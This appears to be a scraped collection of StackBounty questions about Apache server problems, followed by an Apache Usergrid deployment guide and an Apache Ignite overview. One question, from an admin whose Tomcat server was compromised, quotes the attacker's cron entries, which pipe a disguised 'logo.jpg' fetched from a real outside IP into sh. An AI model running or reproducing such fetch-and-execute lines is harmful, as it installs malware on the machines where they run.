#StackBounty: #apache #http-status-code-403 #plesk Random 403 error with apache 2.2 and Plesk 12.5

Bounty: 50

I face strange random 403 error on a Debian serveur with Plesk 12.5 and apache 2.2.

There are several domains on the server but only one domain faces this.

Rondomly, it seems that it tries to display the directory listing instead of serve the index.php file. So, sometimes, it through a 403 error and when refresh the page, it’s ok with a 200 status.

In error_log, I read lots of :

[error] [client xxx.xxx.xxx.xxx] Directory index forbidden by Options directive

The DirectoryIndex was not present in httpd.conf file so I added the rule in additional directives for the domain via the Plesk Web Interface with no luck.

I’m kind of stuck with this.

Any help would be appreciated.

Let me know if you need more info.

Thank you.


Get this bounty!!!

#StackBounty: #php #apache #http-status-code-403 #fpm Random 403 errors with apache+php-fpm

Bounty: 100

On a server of mine, running Ubuntu 14.04.5 with Apache 2.4.23 and php-fpm 7.0.11, I’m getting random 403 errors.

I say “random” because the page I see in logs with 403 are running fine when I try them. Also, I experienced directly (I mean by visiting a site on the server with my browser) that I got a 403 error, then retried (just refreshing) and I got a 200.

The server is running some websites (about a dozen), with various kind of solutions (a couple of WordPress, a few old spaghetti php apps, mostly modern apps based on Symfony framework).

I’d also be happy if someone can point me to some way to increase the verbosity of some logs, to try resolving this issue on myself. Currently I see the 403 errors in the apache logs of vhosts.


Get this bounty!!!

#StackBounty: #apache #polymer Polymer app not loading when using Apache reverse proxy

Bounty: 50

I have a Polymer app running on port 5901 of my VM, and am using Apache reverse proxy to serve the app from the following URL:

http://www.example.com/polymer

The problem is when I go to the URL in a browser, I can see the page title but the page is blank. I also get this error in the console:

Failed to load resource: the server responded with a status of 404 (Not Found)   src/home-page.html

I’m assuming that I have to somehow add the /polymer subdomain to the default URL for the app, but I’m not sure how to do this.


Get this bounty!!!

#StackBounty: #php #apache #caching #xampp How to disable Apache caching in Apache-XAMPP?

Bounty: 50

I am having this weird problem with my XAMPP-Apache.
I am making an log-in system where form is posted to redirect.php page.
I updated the redirect.php and but still it is showing me the same old result.
There is not even a single line to redirect(header fn call) it to another page but still it redirects to home.php page as it was doing in older script.
I tried clearing cache of my browser and changing the browser for testing but didn’t work…I even tried rebooting the server but no change.
Please help me through….


Get this bounty!!!

#StackBounty: #linux #apache #shell #security #tomcat Shell script attack on Apache server, via an corn job of unknown origin

Bounty: 50

While running a project war on Apache tomcat server I found that the server has been compromised.

While running the war on an unknown cron is running like this

[root@PaygateApp2 tmp]# crontab -l -u tomcat
*/11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh
*/12 * * * * curl http://91.230.47.40/pics/logo.jpg|sh

The downloaded logo.jpg has a shell script which is downloading a malware.

I found a similar issue on this website below

https://xn--blgg-hra.no/2017/04/covert-channels-hiding-shell-scripts-in-png-files/

and

https://security.stackexchange.com/questions/160068/kworker34-malware-on-linux

I am unable to find the origin of this cron job scheduler in my whole code.

This cron job

What I wish to know that has anyone faced this issue?
and how should I go about finding the origin of the cron job in code.

Note :

I am working on a JAVA(Struts 2)+jsp+javascript+jquery web project.

This cron job is running every time I am starting my tomcat with the war file of the project, but I am not able to find any scheduler for cron job in my code


Get this bounty!!!

#StackBounty: #apache #denial-of-service How to prove the Apache web server is not accepting connections anymore because of an denial o…

Bounty: 50

I have a network dump (PCAP file) from a “conversation” between a web server apache (192.168.1.2) and some clients:

PCAP File

What a should look for to prove that the server buffer (or TCP WINDOW) is full? I received 403 error (error.log). I know it was a denial of service attack (slowloris).


Get this bounty!!!

Installing Apache UserGrid on linux

About the Project

Apache Usergrid is an open-source Backend-as-a-Service (BaaS or mBaaS) composed of an integrated distributed NoSQL database, application layer and client tier with SDKs for developers looking to rapidly build web and/or mobile applications. It provides elementary services and retrieval features like:

  • User Registration & Management
  • Data Storage
  • File Storage
  • Queues
  • Full Text Search
  • Geolocation Search
  • Joins

It is a multi-tenant system designed for deployment to public cloud environments (such as Amazon Web Services, Rackspace, etc.) or to run on traditional server infrastructures so that anyone can run their own private BaaS deployment.

For architects and back-end teams, it aims to provide a distributed, easily extendable, operationally predictable and highly scalable solution. For front-end developers, it aims to simplify the development process by enabling them to rapidly build and operate mobile and web applications without requiring backend expertise.

Usergrid 2.1.0 Deployment Guide

Though the Usergrid Deployment guide seems to be simple enough, I faced certain hiccups and it took me about 4 days to figure out what I was doing wrong.

This document explains how to deploy the Usergrid v2.1.0 Backend-as-a-Service (BaaS), which comprises the Usergrid Stack, a Java web application, and the Usergrid Portal, which is an HTML5/JavaScript application.

Prerequsites

Below are the software requirements for Usergrid 2.1.0 Stack and Portal. You can install them all on one computer for development purposes, and for deployment you can deploy them separately using clustering.

Linux or a UNIX-like system (Usergrid may run on Windows, but we haven’t tried it)

Download the Apache Usergrid 2.1.0 binary release from the official Usergrid releases page:

After untarring the files that you need for deploying Usergrid Stack and Portal are ROOT.war and usergrid-portal.tar.

Stack STEP #1: Setup Cassandra

As mentioned in prerequisites, follow the installation guide given in link

Usergrid uses Cassandra’s Thrift protocol
Before starting cassandra, on Cassandra 2.x releases you MUST enable Thrift by setting start_rpc in your cassandra.yaml file:

    #Whether to start the thrift rpc server.
    start_rpc: true

Note:DataStax no longer supports the DataStax Community version of Apache Cassandra or the DataStax Distribution of Apache Cassandra. It is best to follow the Apache Documentation

Once you are up and running make a note of these things:

  • The name of the Cassandra cluster
  • Hostname or IP address of each Cassandra node
    • in case of same machine as Usergrid, then localhost. Usergrid would then be running on single machine embedded mode.
  • Port number used for Cassandra RPC (the default is 9160)
  • Replication factor of Cassandra cluster

Stack STEP #2: Setup ElasticSearch

Usergrid also needs access to at least one ElasticSearch node. As with Cassandra, you can setup single ElasticSearch node on your computer, and you should run a cluster in production.

Steps:

  • Download and unzip Elasticsearch
  • Run bin/elasticsearch (or bin\elasticsearch -d on Linux as Background Process) (or bin\elasticsearch.bat on Windows)
  • Run curl http://localhost:9200/

Once you are up and running make a note of these things:

  • The name of the ElasticSearch cluster
  • Hostname or IP address of each ElasticSearch node
    • in case of same machine as Usergrid, then localhost. Usergrid would then be running on single machine embedded mode.
  • Port number used for ElasticSearch protocol (the default is 9200)

Stack STEP #3: Setup Tomcat

The Usergrid Stack is contained in a file named ROOT.war, a standard Java EE WAR ready for deployment to Tomcat. On each machine that will run the Usergrid Stack you must install the Java SE 8 JDK and Tomcat 7+.

Stack STEP #4: Configure Usergrid Stack

You must create a Usergrid properties file called usergrid-deployment.properties. The properties in this file tell Usergrid how to communicate with Cassandra and ElasticSearch, and how to form URLs using the hostname you wish to use for Usegrid. There are many properties that you can set to configure Usergrid.

Once you have created your Usergrid properties file, place it in the Tomcat lib directory. On a Linux system, that directory is probably located at /path/to/tomcat7/lib/

The Default Usergrid Properties File

You should review the defaults in the above file. To get you started, let’s look at a minimal example properties file that you can edit and use as your own.

Please note that if you are installing Usergrid on the same machine as Cassandra Server, then set the following property to true

   #Tell Usergrid that Cassandra is not embedded.
   cassandra.embedded=true

Stack STEP #5: Deploy ROOT.war to Tomcat

The next step is to deploy the Usergrid Stack software to Tomcat. There are a variety of ways of doing this and the simplest is probably to place the Usergrid Stack ROOT.war file into the Tomcat webapps directory, then restart Tomcat.

Look for messages like this, which indicate that the ROOT.war file was deployed:

INFO: Starting service Catalina
Jan 29, 2016 1:00:32 PM org.apache.catalina.core.StandardEngine startInternal
INFO: Starting Servlet Engine: Apache Tomcat/7.0.59
Jan 29, 2016 1:00:32 PM org.apache.catalina.startup.HostConfig deployWAR
INFO: Deploying web application archive /usr/share/tomcat7/webapps/ROOT.war

Does it work?

you can use curl:

curl http://localhost:8080/status

If you get a JSON file of status data, then you’re ready to move to the next step. You should see a response that begins like this:

{
“timestamp” : 1454090178953,
“duration” : 10,
“status” : {
“started” : 1453957327516,
“uptime” : 132851437,
“version” : “201601240200-595955dff9ee4a706de9d97b86c5f0636fe24b43”,
“cassandraAvailable” : true,
“cassandraStatus” : “GREEN”,
“managementAppIndexStatus” : “GREEN”,
“queueDepth” : 0,
“org.apache.usergrid.count.AbstractBatcher” : {
“add_invocation” : {
“type” : “timer”,
“unit” : “microseconds”,
… etc. …

Initialize the Usergrid Database

Next, you must initialize the Usergrid database, index and query systems.

To do this you must issue a series of HTTP operations using the superuser credentials. You can only do this if Usergrid is configured to allow superused login via this property usergrid.sysadmin.login.allowed=true and if you used the above example properties file, it is allowed.

The three operation you must perform are expressed by the curl commands below and, of course, you will have ot change the password test to match the superuser password that you set in your Usergrid properties file.

curl -X PUT http://localhost:8080/system/database/setup -u superuser:test
curl -X PUT http://localhost:8080/system/database/bootstrap -u superuser:test
curl -X GET http://localhost:8080/system/superuser/setup -u superuser:test

When you issue each of those curl commands, you should see a success message like this:

{
“action” : “cassandra setup”,
“status” : “ok”,
“timestamp” : 1454100922067,
“duration” : 374
}

Now that you’ve gotten Usergrid up and running, you’re ready to deploy the Usergrid Portal.

Deploying the Usergrid Portal

The Usergrid Portal is an HTML5/JavaScript application, a bunch of static files that can be deployed to any web server, e.g. Apache HTTPD or Tomcat.

To deploy the Portal to a web server, you will un-tar the usergrid-portal.tar file into directory that serves as the root directory of your web pages.

Once you have done that there is one more step. You need to configure the portal so that it can find the Usergrid stack. You do that by editing the portal/config.js and changing this line:

Usergrid.overrideUrl = ’http://localhost:8080/‘;

To set the hostname that you will be using for your Usergrid installation.

I have deployed a sample instance and tested the same. You can find the system ready configurations in TechUtils repository

#StackBounty: #javascript #node.js #apache #gulp #browser-sync Gulp browser-sync not monitoring and injecting files

Bounty: 50

I have following directory structure

workspace
  |--dev
      |--proj
          |--css 
              |--style.css
          |--js
              |--app.js
          |index.php
          |something.html
          |gulpfile.js
          |package.json

I had installed vhost named as dev.local on ...workspacedev. As you can see I have created a gulpfile.js in my proj directory.

Now if I run gulp browser-sync command my browser window is open showing following url http://dev.local:3000/proj/. It perfectly opens my index.php page but if I do any modification in my files they are not monitored and are not injected into my page. So there is no auto reload of my page.

Here is my gulpfile.js

var gulp = require('gulp');
var bs = require('browser-sync').create(); // create a browser sync instance.

gulp.task('browser-sync', function() {
    bs.init({
        open: 'external',
        host: 'dev.local',
        proxy: 'dev.local/proj'
    });
});

gulp.task('watch', ['browser-sync'], function () {
    gulp.watch("*.html,*.php,css/*.css,js/*.js").on('change', bs.reload);
});

Here is the output of my terminal

gulp browser-sync
[12:14:12] Using gulpfile ~/Documents/workspace/dev/proj/gulpfile.js
[12:14:12] Starting 'browser-sync'...
[12:14:12] Finished 'browser-sync' after 15 ms
[BS] Proxying: http://dev.local
[BS] Access URLs:
 ------------------------------------------------
       Local: http://localhost:3000/proj
    External: http://dev.local:3000/proj
 ------------------------------------------------
          UI: http://localhost:3001
 UI External: http://dev.local:3001
 ------------------------------------------------

I had already searched SO for various solutions but of no avail. Please help I am stuck.

UPDATE

I am using BrowserSync version 2.18.8 and gulp version 3.9.1


Get this bounty!!!

#StackBounty: Unable to modify(update) posts – Page not found

Bounty: 100

For couple of days I am experiencing issues with modifying some of my posts.
When I try to modify the content of post, I get 404 error, redirecting me that page is not found.

Doing Google research, with all basic tests, clear cache, browser, enable/disable plugins, changing permalinks, etc, I’ve found this on WP forum, saying that Apache’s ModSecurity is causing issues:

https://wordpress.org/support/topic/clicking-the-post-draft-button-sometimes-redirects-a-404-not-found-page/


https://wordpress.org/support/topic/404-page-not-found-when-savingupdating-a-postspage/

However, this doesn’t work for me, because I don’t option in Cpanel to disable ModSecurity – disabled from hosting company.

I’ve got this response from them:

Mod_sec is an important server level security feature. We are not
going to disable mod_sec.

Certain WordPress posts (such as ones that appear to be SQL injection
attacks) may trigger mod_sec, but it certainly is not all WordPress
posts.

Is there any work-around to solve this? I have a SSH access, bit limited, but may helps.

Also, I am not 100% sure about – but I’ve noticed that I can(haven’t test all) update my old posts.

Posts that are ~ 5-6m old are throwing 404 error.
WP version is 4.7.2

EDIT

The only option I have now, is to do a backup of production site, load on my locahost, update posts and push it back to production.

However, this isn’t convenient at all. 🙁
Does anyone have a solution?

Please help!
Thanks!


Get this bounty!!!

Apache Ignite: What is Ignite?

Apache Ignite(TM) In-Memory Data Fabric is a high-performance, integrated and distributed in-memory platform for computing and transacting on large-scale data sets in real-time, orders of magnitude faster than possible with traditional disk-based or flash-based technologies.

apache-ignite

FEATURES

You can view Ignite as a collection of independent, well-integrated, in-memory components geared to improve performance and scalability of your application. Some of these components include:


Apache Ignite APIs

Apache Ignite has a reach set of APIs that are covered throughout the documentation. The APIs are implemented in a form of native libraries for such major languages and technologies as Java, .NET and C++ and by supporting a variety of protocols like REST, Memcached or Redis.

The documentation that is located under this domain is mostly related to Java. Refer to the following documentation sections and domains to learn more about alternative technologies and protocols you can use to connect to and work with an Apache Ignite cluster:

Fork It on GIT